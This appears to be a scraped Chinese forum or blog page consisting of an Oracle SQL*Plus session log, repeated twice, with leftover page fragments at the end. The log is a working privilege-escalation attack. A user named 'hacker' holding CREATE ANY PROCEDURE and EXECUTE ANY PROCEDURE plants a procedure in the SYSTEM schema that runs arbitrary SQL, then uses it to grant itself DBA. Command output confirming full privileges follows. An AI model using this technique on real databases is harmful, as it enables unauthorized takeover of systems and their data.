SQL> conn / as sysdba
Connected.
SQL> create user hacker identified by bbk_12345;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure, execute any procedure to hacker;
Grant succeeded.
SQL> conn hacker/bbk_12345
Connected.
SQL> create procedure system.h1(h1_str in varchar2) as
2begin
3execute immediate h1_str;
4end;
5/
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
......
161 rows selected.
搞定
Connected.
SQL> create user hacker identified by bbk_12345;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure, execute any procedure to hacker;
Grant succeeded.
SQL> conn hacker/bbk_12345
Connected.
SQL> create procedure system.h1(h1_str in varchar2) as
2begin
3execute immediate h1_str;
4end;
5/
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
......
161 rows selected.
搞定
664
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
